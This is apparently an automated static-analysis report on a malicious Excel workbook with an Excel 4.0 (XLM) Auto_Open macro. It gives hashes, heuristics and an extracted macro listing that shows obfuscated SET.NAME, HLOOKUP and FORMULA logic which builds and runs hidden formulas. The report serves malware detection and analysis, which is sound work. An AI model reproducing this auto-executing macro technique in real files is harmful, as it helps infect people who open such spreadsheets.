Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95e3a35781595a35…

MALICIOUS

Office (OLE)

36.5 KB Created: 2020-11-25 10:41:56 Authoring application: Microsoft Excel First seen: 2021-04-10
MD5: 58a743a9e3751415a853033d25e6f480 SHA-1: 7bafb9c19128d5ce35beffbbbc6f5ed4376912fc SHA-256: 95e3a35781595a35f6ec5542b9891a11e9562f833facaa07384ad3b94e9c296b
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6774 bytes
SHA-256: 4839b5ed0818a308448b73ecf337dd2964c09e4322beb0cb4945a008f6626c0c
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  MkXSUvHCCVE
' 0018     27 LABEL : Cell Value, String Constant - amChVBPZRHcq len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!D183 
' 0018     25 LABEL : Cell Value, String Constant - bSZDVHiGQG len=0 
' 0018     22 LABEL : Cell Value, String Constant - bvRilHI len=0 
' 0018     23 LABEL : Cell Value, String Constant - DtpOfOPP len=0 
' 0018     25 LABEL : Cell Value, String Constant - GOvtpbBxlc len=0 
' 0018     22 LABEL : Cell Value, String Constant - HeJAcPJ len=0 
' 0018     27 LABEL : Cell Value, String Constant - JgmYLcwjSyxD len=0 
' 0018     27 LABEL : Cell Value, String Constant - KxSpeooIiyvP len=0 
' 0018     24 LABEL : Cell Value, String Constant - ncSmYZfXU len=0 
' 0018     26 LABEL : Cell Value, String Constant - nJvEqbrckJW len=0 
' 0018     23 LABEL : Cell Value, String Constant - pHHhPIwH len=0 
' 0018     27 LABEL : Cell Value, String Constant - QSOlwChcROwI len=0 
' 0018     26 LABEL : Cell Value, String Constant - RqPzigHnuuU len=0 
' 0018     27 LABEL : Cell Value, String Constant - UokMpVJpdYnq len=0 
' 0018     21 LABEL : Cell Value, String Constant - uPceED len=0 
' 0018     27 LABEL : Cell Value, String Constant - WtHdthQjtGGB len=0 
' 0018     22 LABEL : Cell Value, String Constant - YIzQpZA len=0 
' 0018     23 LABEL : Cell Value, String Constant - YWFLubRN len=0 
' 0018     25 LABEL : Cell Value, String Constant - ZNZYWQoRNC len=0 
' 0018     25 LABEL : Cell Value, String Constant - ZvjTtMrVBa len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  MkXSUvHCCVE,D88,"SET.NAME("HeJAcPJ",VALUE("0"))",""
'  MkXSUvHCCVE,D93,"SET.NAME("KxSpeooIiyvP",HeJAcPJ)",""
'  MkXSUvHCCVE,D97,"SET.NAME("pHHhPIwH",HeJAcPJ)",""
'  MkXSUvHCCVE,D100,"SET.NAME("nJvEqbrckJW",COUNTA(ZvjTtMrVBa))",""
'  MkXSUvHCCVE,D104,"SET.NAME("RqPzigHnuuU",COUNTA(JgmYLcwjSyxD))",""
'  MkXSUvHCCVE,D106,[],""
'  MkXSUvHCCVE,D109,"SET.NAME("ncSmYZfXU","")",""
'  MkXSUvHCCVE,D113,"KxSpeooIiyvP",""
'  MkXSUvHCCVE,D117,"SET.NAME("YWFLubRN",HLOOKUP("*",ZvjTtMrVBa,KxSpeooIiyvP,FALSE))",""
'  MkXSUvHCCVE,D122,"amChVBPZRHcq",""
'  MkXSUvHCCVE,D125,"SET.NAME("UokMpVJpdYnq",HeJAcPJ)",""
'  MkXSUvHCCVE,D130,[],""
'  MkXSUvHCCVE,D135,"UokMpVJpdYnq",""
'  MkXSUvHCCVE,D138,"DtpOfOPP",""
'  MkXSUvHCCVE,D142,"YIzQpZA",""
'  MkXSUvHCCVE,D144,"bSZDVHiGQG",""
'  MkXSUvHCCVE,D149,"SET.NAME("GOvtpbBxlc",VALUE(HLOOKUP("*",JgmYLcwjSyxD,bSZDVHiGQG,FALSE)))",""
'  MkXSUvHCCVE,D153,"WtHdthQjtGGB",""
'  MkXSUvHCCVE,D155,"ncSmYZfXU",""
'  MkXSUvHCCVE,D159,"pHHhPIwH",""
'  MkXSUvHCCVE,D161,NEXT(),""
'  MkXSUvHCCVE,D163,"bvRilHI",""
'  MkXSUvHCCVE,D168,"SET.NAME("f",INT(T(FORMULA(T(ncSmYZfXU)&"",""&T(bvRilHI)))))",""
'  MkXSUvHCCVE,D171,"uPceED",""
'  MkXSUvHCCVE,D173,NEXT(),""
'  MkXSUvHCCVE,D178,RETURN(),""
'  MkXSUvHCCVE,D209,"SET.NAME("QSOlwChcROwI",D88)",""
'  MkXSUvHCCVE,D211,"ZvjTtMrVBa",""
'  MkXSUvHCCVE,D216,"SET.NAME("JgmYLcwjSyxD",R58C11)",""
'  MkXSUvHCCVE,D220,"SET.NAME("uPceED",229)",""
'  MkXSUvHCCVE,D223,"SET.NAME("ZNZYWQoRNC",4)",""
'  MkXSUvHCCVE,D228,QSOlwChcROwI(),""
'  MkXSUvHCCVE,D229,HALT(),""